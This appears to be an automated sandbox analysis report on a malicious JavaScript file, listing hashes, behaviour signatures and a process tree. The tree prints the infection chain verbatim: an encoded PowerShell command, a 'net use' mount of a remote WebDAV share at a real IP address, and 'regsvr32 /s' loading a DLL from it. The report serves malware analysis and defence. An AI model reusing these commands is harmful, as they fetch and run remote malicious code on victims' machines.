Analysis

  • max time kernel
    94s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-11-2024 10:46

General

  • Target

    1485223624968714276.js

  • Size

    549KB

  • MD5

    f6e0d4cbfbf4769f1de51ec2be2eef61

  • SHA1

    3a967242ebbae2ddca1694a307b8307b43bafda8

  • SHA256

    67295604fb9a0bb79200b9fabfc66eb8e516339686e975a5287644bb21eda8f8

  • SHA512

    5a57a71f7577714c33987d6e88ff697f17f51fa2359825f89d820a389a19232b81ec2c8e554500c1e56bc5a2c80d313081a733c90f681b9b3b8a54a11f56487a

  • SSDEEP

    3072:qtNeOR4IwX/gei6LbMycM0uXOQgkmZKPk9x3NHYBkBAi5kK7fkJYLMcHYpNnNQMG:qtNeORCgeVb6pga7cORq7cORTORm+

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\1485223624968714276.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4836
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAA7AHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAMgAyADYAMgA1ADgAMQAzADMANAAwADQALgBkAGwAbAA=
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4624
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" use \\94.159.113.79@8888\davwwwroot\
        3⤵
          PID:1516
        • C:\Windows\system32\regsvr32.exe
          "C:\Windows\system32\regsvr32.exe" /s \\94.159.113.79@8888\davwwwroot\21226258133404.dll
          3⤵
            PID:856

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n1hpkkjk.0c5.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/4624-0-0x00007FFCFBDB3000-0x00007FFCFBDB5000-memory.dmp

        Filesize

        8KB

      • memory/4624-2-0x000001D07E5C0000-0x000001D07E5E2000-memory.dmp

        Filesize

        136KB

      • memory/4624-11-0x00007FFCFBDB0000-0x00007FFCFC871000-memory.dmp

        Filesize

        10.8MB

      • memory/4624-12-0x00007FFCFBDB0000-0x00007FFCFC871000-memory.dmp

        Filesize

        10.8MB

      • memory/4624-15-0x00007FFCFBDB0000-0x00007FFCFC871000-memory.dmp

        Filesize

        10.8MB